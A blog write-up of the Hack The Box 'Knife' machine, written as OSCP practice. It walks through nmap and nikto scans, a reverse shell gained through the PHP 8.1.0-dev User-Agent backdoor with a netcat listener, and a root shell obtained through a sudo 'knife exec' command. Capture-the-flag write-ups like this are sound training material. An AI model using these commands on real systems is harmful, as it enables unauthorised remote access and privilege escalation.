Path to OSCP: Knife

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Knife. We fire up nmap:

u01@nostromo:~$ nmap -p- -A knife.htb -oA HTB/knife/knife
Starting Nmap 7.94 ( ) at 2023-09-15 14:04 IST
Nmap scan report for knife.htb (
Host is up (0.044s latency).
Not shown: 65533 closed tcp ports (conn-refused)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 38.17 seconds

The webpage shows the home of a healthcare company:

All “links” are just plain text. There’s nothing of interest in the page source. We try ffuf and gobuster for directory enumeration with various different settings, but can’t find anything of interest.

I kick off a basic Nikto scan to see if it can highlight anything of interest:

u01@nostromo:~$ nikto -host knife.htb
- Nikto v2.5.0
+ Target IP:
+ Target Hostname: knife.htb
+ Target Port: 80
+ Start Time: 2023-09-15 16:24:20 (GMT1)
+ Server: Apache/2.4.41 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/8.1.0-dev.
+ /: The anti-clickjacking X-Frame-Options header is not present. See:
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See:
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ 7962 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2023-09-15 16:29:56 (GMT1) (336 seconds)

It shows that PHP 8.1.0-dev is in use. A quick Google of this version brings me to php-8.1.0-dev-backdoor-rce | PHP 8.1.0-dev Backdoor System Shell Script (, which details a backdoor for this particular PHP version. “If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header”. I clone the repo, and using the reverse shell variant of the exploit we get a reverse shell to a listening netcat as user james and retrieve the user.txt flag:

u01@nostromo:/repo/php-8.1.0-dev-backdoor-rce$ python http://knife.htb 7777
u01@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [] from (UNKNOWN) [] 34682
bash: cannot set terminal process group (1033): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:~$ ls -l ~/user.txt 
ls -l ~/user.txt 
-r-------- 1 james james 33 Sep 15 12:58 /home/james/user.txt

Checking james’ sudo permissions, he can run /usr/bin/knife as root without providing a password:

james@knife:~$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,

User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife

“Knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server”. We check old reliable GTFOBins for any privilege escalation path using sudo permissions with knife, and sure enough there’s a straightforward drop to root shell:

We obtain root using this method and can retrieve the root.txt flag:

james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
uid=0(root) gid=0(root) groups=0(root)
ls -l /root/root.txt
-r-------- 1 root root 33 Sep 15 12:58 /root/root.txt

Takeaway for OSCP

This was a very straightforward box, not a huge amount to takeaway here, other than the useful perspective using an alternative information gathering tool can give you.

Leave a Reply

Your email address will not be published. Required fields are marked *